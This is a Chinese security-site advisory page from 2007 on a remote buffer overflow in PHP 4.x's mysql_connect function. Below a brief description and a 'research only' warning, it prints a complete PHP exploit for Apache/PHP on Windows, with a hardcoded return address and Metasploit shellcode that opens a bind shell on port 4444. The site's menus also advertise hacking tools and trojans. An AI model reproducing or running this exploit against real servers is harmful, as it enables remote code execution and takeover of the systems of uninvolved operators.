文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 安全公告 > 漏洞公告 > 文章内容   您对新版的建议

PHP MySQL_Connect远程溢出漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 

受影响系统:
PHPPHP4.4.1
PHPPHP4.4.0
PHPPHP4.3.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID:16145

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP中存在远程溢出,攻击者可以利用这个在受影响的WebServer上执行任意代码。失败的攻击尝试也可能导致WebServer崩溃。

请注意通常情况下远程攻击者是无法修改访问mysql_connect函数的参数的,因此可限制攻击的可能性。

<*来源:mercenary
 *>

测试方法:
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php

//Exploitfor
//   Apache/1.3.33
//   PHP/4.4.0
//Windowsonly

$eip="71AB5651"; //EIP-CALLESIfromWinsock2.0ws2_32.dllv5.1.2600.0
$esi="10000000"; //ESI-Temporary.Thememoryunderthislocationwillbetrashed.

//Metasploitwin32bindshellonport4444
//Threadexitmethod,nofilter
$shellcode=pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c757ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd09368e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe422dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd068add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0");

//Endianconversion
$eip=substr($eip,6,2).substr($eip,4,2).substr($eip,2,2).substr($eip,0,2);
$esi=substr($esi,6,2).substr($esi,4,2).substr($esi,2,2).substr($esi,0,2);

$overflowstring="localhost:/";
$overflowstring.="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
$overflowstring.=pack("H*",$eip);   //EIP
$overflowstring.=pack("H*",$esi);   //ESI
$overflowstring.="/";

//Ifwedon'tdefinethis,ourshellcodegetstruncated
$two="AAAAAAAAAA";

mysql_connect($overflowstring,$shellcode);

?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
   ---------------------------------------------------------------------------------------------------
  上一篇:PHPWIND 4.1跨站漏洞
  下一篇:L-Blog1.08(SE) 提权漏洞
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
IE 6 被发现严重漏洞
微软严重漏洞 使全部图片
MS08-067漏洞模拟攻击原型
趋势科技:2008年上半年威
Adobe官网爆SQL注入漏洞
微软破例紧急公布严重漏洞
雅虎招聘网存跨站脚本攻击
微软预警:ActiveX再度引来
Google手机上市即曝严重漏
2008年上半年安全研究报告
多家防病毒公司预警微软图
雅虎HotJobs网站发现跨站
Firefox3存重大漏洞 可致D
微软12月安全公告:含8个重
公布漏洞:多款RSS阅读器
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号